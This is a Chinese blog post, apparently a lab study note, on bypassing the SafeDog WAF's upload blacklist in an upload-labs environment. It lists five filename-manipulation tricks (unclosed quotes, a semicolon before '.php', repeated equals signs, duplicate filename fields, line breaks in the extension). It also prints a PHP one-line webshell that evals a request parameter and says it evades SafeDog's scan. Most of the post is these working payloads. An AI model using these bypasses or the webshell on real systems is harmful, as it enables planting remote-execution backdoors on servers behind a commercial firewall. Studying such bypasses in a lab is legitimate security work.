文件上传-绕过安全狗

2024-06-24 08:44:07

1，3，4方法比较稳健

目录

1.用单双引号防匹配绕过

此版本安全狗免杀

2.filename="abc.jpg;.php"

3. filename==="xxx.php"

4.filename=;filename="xxx.php"

5.换行绕过

实验环境

安全狗+phpstudy+upload-labs-master

安全狗开启后，会有一个后缀名上传黑名单

先上传一个图片马，抓包查看

若是正常后缀名，可以上传

换成.php ，就会上传失败

设法绕过（这里是以第二关为例，，过其他关时还要考虑那一关的代码绕过）

1.用单双引号防匹配绕过

将文件名写成 filename="php （去掉右侧引号，上传成功）

换成单引号也行（不加引号也可以）

上传成功，但是普通的木马文件会被扫出来

此版本安全狗免杀

<?php
define("hi","$_REQUEST[pass]");
eval(hi);
?>

上传后连接

2.filename="abc.jpg;.php"

可以绕过上传，保存为 abc.jpg;.php

会以php文件执行

安全狗匹配时，会以分号为结束，后面的 .php 不会被匹配拉黑

这个方法不稳，有时候会被狗拦截

3. filename==="xxx.php"

要三个以上等号，，可以绕过

4.filename=;filename="xxx.php"

多个filename，，安全狗识别时会识别第一个，但是保存时会保存最后一个

5.换行绕过

将代码改为

filename="xxx.p

h

p"

换几次行都行，，因为安全狗匹配时

会将文件名识别为 xxx.p\nh\np

只要将不是 .php 就行

上传保存时会自动取消 \n ,保存为 xxx.php

新版本的安全狗会拦

文件上传-绕过安全狗相关推荐

文件上传绕过安全狗WAF实战
今天继续给大家介绍渗透测试相关知识,本文主要是文件上传绕过安全狗WAF实战. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未 ...
文件上传绕过姿势整理
文件上传绕过姿势整理 WAF绕过安全狗绕过 1.绕过思路:对文件的内容,数据.数据包进行处理. 关键点在这里Content-Disposition: form-data; name="fi ...
各种文件上传绕过姿势（一）
各种文件上传绕过姿势 **目录** 各种文件上传绕过姿势写在前面一.前端绕过 1.1 防护手段 1.2 绕过方法二.检查MIME类型 2.1 防护手段 2.2 绕过方法三.黑名单绕过(一) 3 ...
文件上传绕过各种姿势
漏洞简介文件上传,顾名思义就是上传文件的功能行为,之所以会被发展为危害严重的漏洞,是程序没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验.文件上传漏洞是漏洞中最为简 ...
【文件上传绕过】——后端检测_文件的扩展名检测漏洞
文章目录一.漏洞说明: 二.工具: 三.实验环境: 四.实验目的: 五.检测方法: 1. 黑名单: 2. 白名单: 六.绕过方式: 1. 白名单绕过: 1.1 解析漏洞: 1.2 截断上传: 原理: ...
文件上传绕过WAF之Fuzz测试
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件上传绕过WAF之Fuzz测试. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调: ...
【甄选靶场】Vulnhub百个项目渗透——项目十八：pwnlab_init（LFI本地文件包含，PHP伪协议，文件上传绕过，逆向分析）
Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目十八:pwnlab_init(LFI本地文件包含,PHP伪协议,文件上传绕过,逆向分析) 靶场地址
[网络安全自学篇] 三十三.文件上传之绕狗一句话原理和绕过安全狗（六）
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合C ...
最新版安全狗(v4.0.2.665) 文件上传绕过
0x00 前言: 继续上次 bypass 安全狗,这次测试的是 bypass 最新版安全狗来上传 php 一句话 0x01 实验环境: win7 sp1 + phpstudy v8.1(apache ...

最新文章

热门文章